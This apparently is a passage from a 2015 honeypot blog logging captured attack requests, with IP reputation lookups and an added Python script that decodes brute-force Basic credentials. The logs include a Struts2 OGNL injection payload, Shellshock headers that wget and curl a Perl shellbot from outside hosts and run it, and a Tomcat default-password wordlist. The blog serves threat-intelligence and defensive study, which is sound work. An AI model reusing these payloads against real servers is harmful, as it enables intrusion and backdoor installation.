Content-Type: application/x-www-form-urlencoded
Host: 195.169.125.87
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive

redirect:${%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()}
 END OF DATA

61.186.245[.]211

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4134 Chinanet
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.186.245.211
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

177.157.43.206 - /webcalendar/install/index.php

BEGIN OF HTTP DATA:
2015-10-10 01:01:15
Source IP: 177.157.43.206
Country: BR RiskScore: 1 Malware: []
GET /webcalendar/install/index.php HTTP/1.1
TE: deflate,gzip;q=0.3
Keep-Alive: 300
Connection: Keep-Alive, TE
Host: 195.169.125.87
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]

Caught my eye because of an available exploit for webcalendar, see here:
https://www.exploit-db.com/exploits/18775/

177.157.43[.]206

    Static Source: GeoIP data
  • Country: Brazil
  • ASN: AS18881 Global Village Telecom
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/177.157.43.206
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Thursday, 8 October 2015

208.100.26.231 - MongoDB scanning ip

I found the IP scanning and sending random data to almost all services on my honeypot.

28 events like:
BEGIN OF MONGODB DATA:
2015-10-09 00:11:14
Source IP: 208.100.26.231
Country: US RiskScore: 1 Malware: []
GET / HTTP/1.0

208.100.26[.]231

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.231
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 208.100.26[.]231

    Source: Local Feed Database
  • Title: 208.100.26.231 - fire on port 8080
  • Reference: http://sendmespamids.blogspot.com/2015/09/20810026231-fire-on-port-8080.html
  • In db since: 2015-09-24 08:17:16.658000

Wednesday, 7 October 2015

208.100.26.230 - Several FTP attempts

BEGIN OF FTP DATA:
2015-10-08 02:08:56
Source IP: 208.100.26.230
Country: US RiskScore: 1 Malware: []
Basically every access method was tried; in the logs I can see:
  • HTTP
  • Kerberos
  • Lanman
  • etc.

208.100.26[.]230

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS32748 Steadfast Networks
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/208.100.26.230
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Tuesday, 6 October 2015

62.210.157.90 - shellbot via 23.229.121.186

BEGIN OF HTTP DATA:
2015-10-07 05:42:05
Source IP: 62.210.157.90
Country: FR RiskScore: 1 Malware: []
GET /hello HTTP/1.0
Host: 109.234.106.8
User-Agent: () { :;}; /bin/bash -c "cd /tmp ; rm -rf j* ; wget http://23.229.121.186/paf ; lwp-download http://23.229.121.186/paf ; curl -O /tmp/paf http://23.229.121.186/paf ; perl paf ; perl /tmp/paf ; rm -rf *ju;rm -rf jur*"

When I try to download the malware, ZoneAlarm reports a
Backdoor.Perl.Shellbot.s

62.210.157[.]90

    Static Source: GeoIP data
  • Country: France
  • ASN: AS12876 ONLINE S.A.S.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/62.210.157.90
    Static Source: http://sendmespamids.blogspot.nl/ Blacklist
  • Comment: Listed on Honeypot blacklist
  • Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

23.229.121[.]186

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS36352 ColoCrossing
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/23.229.121.186

Sunday, 4 October 2015

187.210.107.242 - wget from 79.99.248.2

BEGIN OF HTTP DATA:
2015-10-04 16:57:03
Source IP: 187.210.107.242
Country: MX RiskScore: 10 Malware:
GET /cgi-bin/php4 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget 79.99.248.2/TEST231;curl 79.99.248.2/TEST231;fetch 79.99.248.2/TEST231;lwp-download 79.99.248.2/TEST231;GET 79.99.248.2/TEST231");'
Host: 109.234.106.8
Connection: Close


79.99.248[.]2

    Static Source: GeoIP data
  • Country: Georgia
  • ASN: AS44877 Vtel-Georgia
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/79.99.248.2

187.210.107[.]242

    Static Source: GeoIP data
  • Country: Mexico
  • ASN: AS8151 Uninet S.A. de C.V.
    Dynamic Source: IBM X-Force Exchange
  • Score: 10
  • Reference: https://exchange.xforce.ibmcloud.com/ip/187.210.107.242
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/187.210.107.242
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt
    Dynamic Source: projecthoneypot.org
  • Last seen: 20 day(s) ago
  • Score: 25 (25 = 100 Spam per day, 75 = 1mio Spam per day)
  • Category: Suspicious (1)


Saturday, 3 October 2015

61.160.247.11 - Authorization: Basic attempts

BEGIN OF HTTP DATA:
2015-10-02 08:08:13
Source IP: 61.160.247.11
Country: CN RiskScore: 1 Malware: []
GET /manager/html HTTP/1.1
Authorization: Basic cm9vdDpzM2NyZXQ=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host:4393160:80

61.160.247[.]11

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.247.11
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt

Authorization: Basic cm9vdDphZG1pbg==
Authorization: Basic cm9vdDp0b21jYXQ=
Authorization: Basic cm9vdDpyb290
Authorization: Basic cm9vdDpwYXNzd29yZA==
Authorization: Basic cm9vdDpzM2NyZXQ=
Authorization: Basic cm9vdDptYW5hZ2Vy
Authorization: Basic YWRtaW46YWRtaW4=
Authorization: Basic YWRtaW46dG9tY2F0
Authorization: Basic YWRtaW46cm9vdA==
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Authorization: Basic YWRtaW46czNjcmV0
Authorization: Basic YWRtaW46bWFuYWdlcg==
Authorization: Basic bWFuYWdlcjphZG1pbg==
Authorization: Basic bWFuYWdlcjp0b21jYXQ=
Authorization: Basic bWFuYWdlcjpyb290
Authorization: Basic bWFuYWdlcjpwYXNzd29yZA==
Authorization: Basic bWFuYWdlcjpzM2NyZXQ=
Authorization: Basic bWFuYWdlcjptYW5hZ2Vy
Authorization: Basic dG9tY2F0OmFkbWlu
Authorization: Basic dG9tY2F0OnRvbWNhdA==
Authorization: Basic dG9tY2F0OnJvb3Q=
Authorization: Basic dG9tY2F0OnBhc3N3b3Jk
Authorization: Basic dG9tY2F0OnMzY3JldA==
Authorization: Basic dG9tY2F0Om1hbmFnZXI=
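
The 24 Basic tokens above are a small wordlist run against the Tomcat manager: four usernames (root, admin, manager, tomcat) times six passwords (admin, tomcat, root, password, s3cret, manager). The same kind of guess arrived on 19 October in a different wrapper, a wp.getUsersBlogs XML-RPC call whose first two parameters are the WordPress username and password. The code below is an added example, not part of the original post, covering both of those entries: it decodes Basic headers, pulls the credential pair out of wp.* XML-RPC bodies, and groups every guessed password per username. The header lines and the XML-RPC body are constructed from the captures on this page, including the empty "Basic Og==" from the 21 October cookie-spray request, which decodes to ":" and is kept as an empty-username entry rather than dropped.

```python
import base64
import re
import xml.etree.ElementTree as ET
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

BASIC_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.I)


def decode_basic(token: str) -> Optional[Tuple[str, str]]:
    """Decode one Basic token into (user, password); None if it is not user:pass."""
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:                  # binascii.Error is a ValueError subclass
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


def wp_xmlrpc_credentials(body: str) -> Optional[Tuple[str, str, str]]:
    """For WordPress XML-RPC calls whose first two params are username and
    password (wp.getUsersBlogs in the 19 October entry), return (method, user, password)."""
    try:
        root = ET.fromstring(body)      # prefer defusedxml.ElementTree on untrusted input
    except ET.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    method = root.findtext("methodName", default="")
    params = [v.text or "" for v in root.findall("./params/param/value/string")]
    if method.startswith("wp.") and len(params) >= 2:
        return method, params[0], params[1]
    return None


def summarize_guesses(header_lines: List[str], xmlrpc_bodies: List[str]) -> Dict[str, List[str]]:
    """Collect every guessed password per username across both probe styles."""
    by_user: Dict[str, set] = defaultdict(set)
    for line in header_lines:
        m = BASIC_RE.match(line.strip())
        creds = decode_basic(m.group(1)) if m else None
        if creds is not None:
            by_user[creds[0]].add(creds[1])
    for body in xmlrpc_bodies:
        hit = wp_xmlrpc_credentials(body)
        if hit is not None:
            by_user[hit[1]].add(hit[2])
    return {user: sorted(pws) for user, pws in by_user.items()}


# Constructed from this page: the 24 tokens sent to /manager/html, the empty
# "Basic Og==" from the 21 October request, and the 19 October XML-RPC body.
BASIC_TOKENS = """
cm9vdDphZG1pbg== cm9vdDp0b21jYXQ= cm9vdDpyb290 cm9vdDpwYXNzd29yZA== cm9vdDpzM2NyZXQ= cm9vdDptYW5hZ2Vy
YWRtaW46YWRtaW4= YWRtaW46dG9tY2F0 YWRtaW46cm9vdA== YWRtaW46cGFzc3dvcmQ= YWRtaW46czNjcmV0 YWRtaW46bWFuYWdlcg==
bWFuYWdlcjphZG1pbg== bWFuYWdlcjp0b21jYXQ= bWFuYWdlcjpyb290 bWFuYWdlcjpwYXNzd29yZA== bWFuYWdlcjpzM2NyZXQ= bWFuYWdlcjptYW5hZ2Vy
dG9tY2F0OmFkbWlu dG9tY2F0OnRvbWNhdA== dG9tY2F0OnJvb3Q= dG9tY2F0OnBhc3N3b3Jk dG9tY2F0OnMzY3JldA== dG9tY2F0Om1hbmFnZXI=
""".split()
SAMPLE_HEADERS = [f"Authorization: Basic {t}" for t in BASIC_TOKENS] + ["Authorization: Basic Og=="]
SAMPLE_XMLRPC = ('<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName>'
                 '<params><param><value><string>admin</string></value></param>'
                 '<param><value><string>narecumsafie55</string></value></param></params></methodCall>')

if __name__ == "__main__":
    for user, passwords in summarize_guesses(SAMPLE_HEADERS, [SAMPLE_XMLRPC]).items():
        print(f"{user!r}: {passwords}")
```

Decoding the tokens is what turns a wall of base64 into something actionable: the password set shows it is a generic Tomcat default-credential list, and keeping the per-user view makes it obvious when an attacker has moved from defaults to a targeted password.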